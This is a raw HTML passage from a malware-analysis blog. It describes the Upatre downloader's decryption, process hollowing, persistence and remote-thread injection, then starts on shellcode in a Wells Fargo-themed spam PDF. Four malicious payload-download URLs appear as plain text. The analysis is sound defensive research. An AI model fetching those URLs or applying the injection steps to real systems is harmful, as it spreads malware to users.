<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8OXC6_sfD1PwPOy7IaBidLN6LiwJ5u94Ur-u1UWmdE7Hfk_kcOetN0DYJdNXrHAohfvUufRHTfuWEm2kF_RqU1XFHN1RUj1UR4ZRTgla5CZMMc5QKq2LrsoGsdrYPzmVdFRX-RP5gu0/s1600/Upatre_image3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8OXC6_sfD1PwPOy7IaBidLN6LiwJ5u94Ur-u1UWmdE7Hfk_kcOetN0DYJdNXrHAohfvUufRHTfuWEm2kF_RqU1XFHN1RUj1UR4ZRTgla5CZMMc5QKq2LrsoGsdrYPzmVdFRX-RP5gu0/s1600/Upatre_image3.jpeg" height="176" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Create and Execute budha.exe<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
It will connect to the following sites to download another
malware which is the encrypted one (“.enc” or “.exe” files).<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .25in;">
</div>
<ul>
<li>dcmsservices.com/images/stories/slides/pdf.enc</li>
<li>electriciansdublinireland.com/wp-content/uploads/2014/01/pdf.enc</li>
<li>freebiegalore.com/facelift/pdf.exe</li>
<li>freebiesvaults.info/freebies/nucleus/images/pdf.exe</li>
</ul>
<o:p></o:p><br />
<div class="MsoNormal" style="margin-left: .25in;">
<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
</div>
<div class="MsoNormal" style="margin-left: .25in;">
<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OAobBalUBrgceNIf8ObT6xHHT9PQSw1OZjUo29eZpxcexLQE0J_8guA3OjdaEO5w-YxBiA7Ldfp34ZnWRhXDuBK00G0E_CjKwvOHddEdnHEFr99Q5d9lkzKp5vb4Us_xVqLSz1GUu4I/s1600/Upatre_image4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OAobBalUBrgceNIf8ObT6xHHT9PQSw1OZjUo29eZpxcexLQE0J_8guA3OjdaEO5w-YxBiA7Ldfp34ZnWRhXDuBK00G0E_CjKwvOHddEdnHEFr99Q5d9lkzKp5vb4Us_xVqLSz1GUu4I/s1600/Upatre_image4.jpeg" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
This file is also the one responsible in decrypting and
decompressing the downloaded file. In the above memory dump at offset 60, the
first four bytes are the decryption keys using XOR operand. But before
decrypting the downloaded files it will first check if the magic bytes of the
downloaded file are ZZP\0. Decrypted files are in a compressed form and are
needed to decompress using RTLDecompressBuffer<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtrNXqnPMnvDXhCbvngBhKH69jMgxKd-w21UhCpyMv0LIY6dtw1MEQZIy5dGelguE36iod2BtuWh6AfgXLFiaF1UdYYnP5-2KxraFp7vmY37skgk89v8TzhC7H_pyJGeOcaZmWX-fYfc/s1600/Upatre_image5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtrNXqnPMnvDXhCbvngBhKH69jMgxKd-w21UhCpyMv0LIY6dtw1MEQZIy5dGelguE36iod2BtuWh6AfgXLFiaF1UdYYnP5-2KxraFp7vmY37skgk89v8TzhC7H_pyJGeOcaZmWX-fYfc/s1600/Upatre_image5.jpeg" height="104" width="640" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Magic Bytes checking</i><o:p></o:p></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyV0smbfg1CTDF0xuA-2WPWDZExQn0Q8CzGRDjxAQBQpRdA5Zs9ojZsOSnkZ5bwIeQYo5aPeXL69HN3Hfjhi0kLxac-MVYxb-m_1G3j5JcJqxeNudCZ1lxVxGmMjV6WIqkhn-CSqCjVug/s1600/Upatre_image6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyV0smbfg1CTDF0xuA-2WPWDZExQn0Q8CzGRDjxAQBQpRdA5Zs9ojZsOSnkZ5bwIeQYo5aPeXL69HN3Hfjhi0kLxac-MVYxb-m_1G3j5JcJqxeNudCZ1lxVxGmMjV6WIqkhn-CSqCjVug/s1600/Upatre_image6.jpeg" height="171" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Decryption and Decompression routine<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi8_9FRF92PM6UWfVxB-iYsYq9Z7xIj8FFKy7Yaonm9E9J4VqJkW0vhNgUFwOK6hkpKPyElInZVXzDrhUxozkJXCR4_scIoRWcxF1xGJ-GFJj-hKds7KYJq0N1MlskBwWaPo3_ZeTBPzs/s1600/Upatre_image7.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi8_9FRF92PM6UWfVxB-iYsYq9Z7xIj8FFKy7Yaonm9E9J4VqJkW0vhNgUFwOK6hkpKPyElInZVXzDrhUxozkJXCR4_scIoRWcxF1xGJ-GFJj-hKds7KYJq0N1MlskBwWaPo3_ZeTBPzs/s1600/Upatre_image7.jpeg" height="400" width="362" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Copy of decrypted file<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
<i><span style="font-size: 10.0pt; line-height: 115%;">Note: ZZP/0 is not included in bytes
to be decrypt. <o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-size: 10.0pt; line-height: 115%;"><br /></span></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
</div>
<div class="MsoNormal">
If the above check fails, it will skip the decryption part
and proceed on checking the MZ header. It will create a copy of decompressed or
a valid win32 PE downloaded file in %TEMP% folder and then execute it.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9nf-v6yDOucPeqDBlf4lcNbPizPWBez0IwRGmILVFjSAIVmoZDdw4YQhpz1su8yhIJrVrgHeEXm0vnKbm9kLAgdOhnGMRKu-ZgAshCdE11026CRSuDWi9jNsFTzDWuVmtjWMo-CE-2W8/s1600/Upatre_image8.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9nf-v6yDOucPeqDBlf4lcNbPizPWBez0IwRGmILVFjSAIVmoZDdw4YQhpz1su8yhIJrVrgHeEXm0vnKbm9kLAgdOhnGMRKu-ZgAshCdE11026CRSuDWi9jNsFTzDWuVmtjWMo-CE-2W8/s1600/Upatre_image8.jpeg" height="140" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>MZ header checking and creating a copy of downloaded file<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
The Downloaded File<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
The downloaded file contains encrypted file in resource
section.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPnDa0hTOjblLHaey5IFQmFqEetVd171KvEywpGWMJ17nzgWnQpsopDog3boRghp8UZCVk5MXXu79BWAQLsHFjmmmpcHm023dvMaNSLdowHWNLdBR71Tf0nBD85F8INJrbaW5vyR0aMq0/s1600/Upatre_image9.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPnDa0hTOjblLHaey5IFQmFqEetVd171KvEywpGWMJ17nzgWnQpsopDog3boRghp8UZCVk5MXXu79BWAQLsHFjmmmpcHm023dvMaNSLdowHWNLdBR71Tf0nBD85F8INJrbaW5vyR0aMq0/s1600/Upatre_image9.jpeg" height="341" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
Encrypted resource<br />
<br />
<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXS-SoLdloVysD-Sw1e146vevXlUafuFJIMFUl4cqHimUjY1N-Xl_DjitSIFWO5dYXGFGWm9WJBlME6Z5u5GLTrBGOH_5ZUGAWxFL1E1AGxXlxpHJz8wtefDSihSiPMPywHtj-cgacIOQ/s1600/Upatre_image10.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXS-SoLdloVysD-Sw1e146vevXlUafuFJIMFUl4cqHimUjY1N-Xl_DjitSIFWO5dYXGFGWm9WJBlME6Z5u5GLTrBGOH_5ZUGAWxFL1E1AGxXlxpHJz8wtefDSihSiPMPywHtj-cgacIOQ/s1600/Upatre_image10.jpeg" height="376" width="400" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Decrypted
resource</span></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal">
It parses resource section through the FindResource,
LoadResource and LockResource APIs instead of LoadBitmap so that it can copy
its data to another application.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3SOqmj60PyE5eDaBfOAYc1GnTeC0FNoDLyQ8B44GisMHWXYLlr59vgyvUs0hEFRw2Hwjwkh_Yh97d_I7Qm-ZTEpYmdxj1pvt6RL3xEEWHnU_hMHMH4AbJx4wGJzMw6arT_RM-oveOGD8/s1600/Upatre_image11.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3SOqmj60PyE5eDaBfOAYc1GnTeC0FNoDLyQ8B44GisMHWXYLlr59vgyvUs0hEFRw2Hwjwkh_Yh97d_I7Qm-ZTEpYmdxj1pvt6RL3xEEWHnU_hMHMH4AbJx4wGJzMw6arT_RM-oveOGD8/s1600/Upatre_image11.jpeg" height="167" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
This malware is simply the loader of the encrypted Win32
file in Resource section. It uses process hollowing technique to load the said
file but instead of loading legitimate process, it creates another process of
the downloaded file in a suspended state.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVI7hCgVo69oGbpQIF18dR_XSAQcj69ONoBg11JI4hqg146SLUQGb4d5kmR9oHE2rlD4CyJGZ2TJJuBRmAbcDO3vSiCBFHXuBFmZsApWggLEGrFuzA0DvdfO4ZaHlexPmaqOMdUk7pkYk/s1600/Upatre_image12.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVI7hCgVo69oGbpQIF18dR_XSAQcj69ONoBg11JI4hqg146SLUQGb4d5kmR9oHE2rlD4CyJGZ2TJJuBRmAbcDO3vSiCBFHXuBFmZsApWggLEGrFuzA0DvdfO4ZaHlexPmaqOMdUk7pkYk/s1600/Upatre_image12.jpeg" height="58" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0NR5YxVph3AODkLMh7WgY_3S61FuRGmpBjPFasu1U-pFTTMq3nhWIxbW8Rc4EtEaKVcZkKoNwp-DjJZ7E2fZW3Lzjzop3jDk-MkM8D3DzZfIQGKBolPCf62bwXX9IwV_VKgrkcBOe6I/s1600/Upatre_image13.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0NR5YxVph3AODkLMh7WgY_3S61FuRGmpBjPFasu1U-pFTTMq3nhWIxbW8Rc4EtEaKVcZkKoNwp-DjJZ7E2fZW3Lzjzop3jDk-MkM8D3DzZfIQGKBolPCf62bwXX9IwV_VKgrkcBOe6I/s1600/Upatre_image13.jpeg" height="152" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
Then the malware will unmap the original code from memory in
the host process using <span style="background: white; mso-bidi-font-family: "Courier New";">ZwUnmapViewOfSection API</span>, and use VirtualAllocEx to
allocate memory for the new code.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiviOBoa0ZHLoJkv4UIGGxsvf0k3l-35hweSzSyQ-PL89cBbzuKb9tSW7Eg5zZzWERk8qM1rmoKOGJ9s0mXQaaGLXWghs3PZ581kMpAwZyRwle9PJCRYgdlPBTqcGHkZCi4FeAnMDSipqk/s1600/Upatre_image14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiviOBoa0ZHLoJkv4UIGGxsvf0k3l-35hweSzSyQ-PL89cBbzuKb9tSW7Eg5zZzWERk8qM1rmoKOGJ9s0mXQaaGLXWghs3PZ581kMpAwZyRwle9PJCRYgdlPBTqcGHkZCi4FeAnMDSipqk/s1600/Upatre_image14.jpeg" height="185" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The malware will write its new code into the hollow host
process using WriteProcessMemory. The data to be written into the hollow host
process is from resource section of the downloaded file (0x40555A). Then the
malware will simply resume the suspended process using ResumeThread.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8RrHXy4qpLtoyphrrk4PYUxl8ao8SBUN3XSZACK850gmWJ5yrguWeusnuCEqqa3gtIdcFkpx8g1a3A_tHrRb0xB2MKEv-RBK3qNFnKLP37Vv1ZtDC3EAbpPvaftUJfBxOeYDrhaBDNqE/s1600/Upatre_image15.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8RrHXy4qpLtoyphrrk4PYUxl8ao8SBUN3XSZACK850gmWJ5yrguWeusnuCEqqa3gtIdcFkpx8g1a3A_tHrRb0xB2MKEv-RBK3qNFnKLP37Vv1ZtDC3EAbpPvaftUJfBxOeYDrhaBDNqE/s1600/Upatre_image15.jpeg" height="142" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjE2KPxR5xwPRCUOgpxde_I8Ya8sxZ6NX9lgNGY7g3RBHa2DBmvJsDUdr-NrlLj4C7vrxpcXYj0OhGaD8lhY3oEhlVOnMY0BJXfLqMUVq7mD84QXgHaua1_sOYTq5uCAArmCHDVIZ8cM/s1600/Upatre_image14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjE2KPxR5xwPRCUOgpxde_I8Ya8sxZ6NX9lgNGY7g3RBHa2DBmvJsDUdr-NrlLj4C7vrxpcXYj0OhGaD8lhY3oEhlVOnMY0BJXfLqMUVq7mD84QXgHaua1_sOYTq5uCAArmCHDVIZ8cM/s1600/Upatre_image14.jpeg" height="185" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<div class="MsoNormal">
The hallowed process contains an encrypted chunk of code where in
these codes are responsible for calling the functions in creating a copy of
itself.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
</div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt-sJJliGyEd7VNxPf6CgMIjJewRJF8XahVPOcghSRy52fmoJMLe9chT15IkH59yuo2pcMyY-FuGcxi_prxN034W3W2MxeJqHwA5XD7i8U4SY6iYQ0amqPs9IDv6huxHqtHeo_oqAj2HA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt-sJJliGyEd7VNxPf6CgMIjJewRJF8XahVPOcghSRy52fmoJMLe9chT15IkH59yuo2pcMyY-FuGcxi_prxN034W3W2MxeJqHwA5XD7i8U4SY6iYQ0amqPs9IDv6huxHqtHeo_oqAj2HA/s1600/1.png" height="125" width="400" /></a></div>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
It will create a folder in %APPDATA% with a random folder name, first
character is always in capital letters. This folder contains a copy of this
malware also with a random filename.<o:p></o:p></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1StkU56RsFhAqBrXQhjZcu74ZPb6z9dmKJAoncVnPx6rEssDPzhcdRE4COdbeSTORedYE4CvcXiF9yBHgeee-ucAMK6wH0QT0QQh_UVynzdZIJZ-iMs1V6rRDEBFT3pN2hcKC28iAu4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1StkU56RsFhAqBrXQhjZcu74ZPb6z9dmKJAoncVnPx6rEssDPzhcdRE4COdbeSTORedYE4CvcXiF9yBHgeee-ucAMK6wH0QT0QQh_UVynzdZIJZ-iMs1V6rRDEBFT3pN2hcKC28iAu4/s1600/2.png" height="376" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Code snippet in generating random folder and
malware name</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdo5JDb_GGgWfGyu_uwPbJAJvjisv_Loby1M1gtI-bCKxoKDYDfPli96VkIQS8Yyi65DWbEp9msqPCaf4iWO9uNwuyoQCsKHr2ZyNh8CfdOyljT2HQHiPNmLeBBkn0DLVFzBIqaafi26k/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdo5JDb_GGgWfGyu_uwPbJAJvjisv_Loby1M1gtI-bCKxoKDYDfPli96VkIQS8Yyi65DWbEp9msqPCaf4iWO9uNwuyoQCsKHr2ZyNh8CfdOyljT2HQHiPNmLeBBkn0DLVFzBIqaafi26k/s1600/3.png" height="63" width="400" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<i>Sample
folder and malware name<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<i><br /></i></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
Then this malware will execute the created copy of itself using
CreateProcessW.<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3bj1H3rkztQKJ43FYdOQY7hI-FsWkhvIfUsCJQ74yYJmu-PhrCl3ug8k1xnqrksKu_EWj-ZDhizlQ2SBAWNZ0-nhmgP4kb4_JwfUFSWwt8tU8wpIfrpx0KPEAVflfGpEqTummmMcV2h8/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3bj1H3rkztQKJ43FYdOQY7hI-FsWkhvIfUsCJQ74yYJmu-PhrCl3ug8k1xnqrksKu_EWj-ZDhizlQ2SBAWNZ0-nhmgP4kb4_JwfUFSWwt8tU8wpIfrpx0KPEAVflfGpEqTummmMcV2h8/s1600/4.png" height="123" width="320" /></a></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
</div>
<div class="MsoNormal">
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
It will enumerate all of the running processes and check the SID length
of each process. In this case if the SID length is 0x1c the malware will create
thread that run into the virtual address space of this process through
CreateRemoteThread.<br />
<br />
<br />
<br />
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
bernadettehttp://www.blogger.com/profile/15725392824740427602noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-28360177156611824162014-07-27T23:09:00.000-07:002014-07-27T23:09:10.735-07:00Wells Fargo Spam: ShellCode analysis<br />
<div class="MsoNormal">
This
PDF exploit arrives as an attachment to an email which claims to be from Wells
Fargo Accounting<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Upon
inspection of the PDF objects, we can see that one the the objects contains a
java script which contains the following:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<ol>
<li>Image
allocation (including a ridiculously large one)</li>
<li>Array
allocation</li>
<li>Assembly
algorithms</li>
</ol>
<o:p></o:p><br />
<div class="MsoNormal">
<o:p></o:p></div>
<br />
<div class="MsoNormal">
<o:p></o:p></div>
<ol>
</ol>
<ol>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGfjs4gEpEti-h5kXVP_viPTJT-NpMZefZ4AG8OilmAQuUvimIvgcwmW0pnhAddD-vrLWWKIdFnWCZvySfc5MCu9byhz5b-xd6nbLjpTmFQg9BA28aot-QJxqoNcsTQWMKYCoskyWiT2hD/s1600/SuspiciousArray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGfjs4gEpEti-h5kXVP_viPTJT-NpMZefZ4AG8OilmAQuUvimIvgcwmW0pnhAddD-vrLWWKIdFnWCZvySfc5MCu9byhz5b-xd6nbLjpTmFQg9BA28aot-QJxqoNcsTQWMKYCoskyWiT2hD/s1600/SuspiciousArray.jpg" height="82" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Array allocation</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhUCOIJufjjXosHOBdLBKQ6KtBc0EYYLeWqa3fQqs0n76PFDVGYVgR68Ui-OpRJNm6lK6iAhMIm-_5AGcdJBj9GsGWnAR-nhrs6jSIxpKkaRN_d3RIjwcjxhAfywnhqxevuV9bNhuZyQ6/s1600/RawDump.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhUCOIJufjjXosHOBdLBKQ6KtBc0EYYLeWqa3fQqs0n76PFDVGYVgR68Ui-OpRJNm6lK6iAhMIm-_5AGcdJBj9GsGWnAR-nhrs6jSIxpKkaRN_d3RIjwcjxhAfywnhqxevuV9bNhuZyQ6/s1600/RawDump.jpg" height="56" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Raw Dump</td></tr>
</tbody></table>
<div class="MsoNormal">
Closer
inspection of the said suspicious array gives us a what looks to be a
target url but it is jumbled.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Reconstructing
the given file gives us the following</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdJg5zdi-lZ4u-tkYVT1nQJS2TV73aP3NeF6Wn8JIes8gj0a2tBjhG-Gv5I3ymDu0t9w_kKbRr8W6kNkWl12b5FygcY7QvSZeOFUX9kYjN7GxWnkrhJIDt9NfGLOXQnwb74dJnuiyrg93z/s1600/FixedDump.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdJg5zdi-lZ4u-tkYVT1nQJS2TV73aP3NeF6Wn8JIes8gj0a2tBjhG-Gv5I3ymDu0t9w_kKbRr8W6kNkWl12b5FygcY7QvSZeOFUX9kYjN7GxWnkrhJIDt9NfGLOXQnwb74dJnuiyrg93z/s1600/FixedDump.jpg" height="47" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: Fixed Dump </td></tr>
</tbody></table>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It
looks that this is the shell code but based from the fixed output, we cannot
verify what the URL is for.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
A quick look at the code and we can see that it contains a decryption code</div>
<div class="MsoNormal">
<o:p></o:p></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<br /></div>
